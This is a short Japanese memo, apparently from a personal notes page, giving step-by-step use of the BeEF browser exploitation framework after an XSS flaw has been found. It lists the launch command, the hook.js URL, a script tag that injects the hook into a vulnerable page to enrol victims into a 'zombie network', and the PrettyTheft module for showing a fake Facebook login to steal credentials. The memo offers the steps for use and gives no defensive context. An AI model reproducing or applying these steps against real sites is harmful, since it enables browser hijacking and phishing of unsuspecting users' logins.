BeEFはXSSを利用したエクスプロイトツール。
    BurpSuiteやOWASPZAPで脆弱性を発見した後に攻撃を行う際に利用。

    1.UIページ起動
    # beef-xss

    2.フックページ起動(ターゲットユーザーを制御するペイロードがある)
    # firefox http://127.0.0.1:3000/hook.js

    3.XSSゾンビネットワークへの取り込み
    ・・・<script src=[hook.jsのURL]></script>・・・

    4.Facebookのログイン画面を使ったXSSエクスプロイト
    Commandsタブ → SocialEngineering → PrettyTheft → 
    Custom LogoのIPをBeEFのIPに変更 → Execute → IDの0を確認
トップへ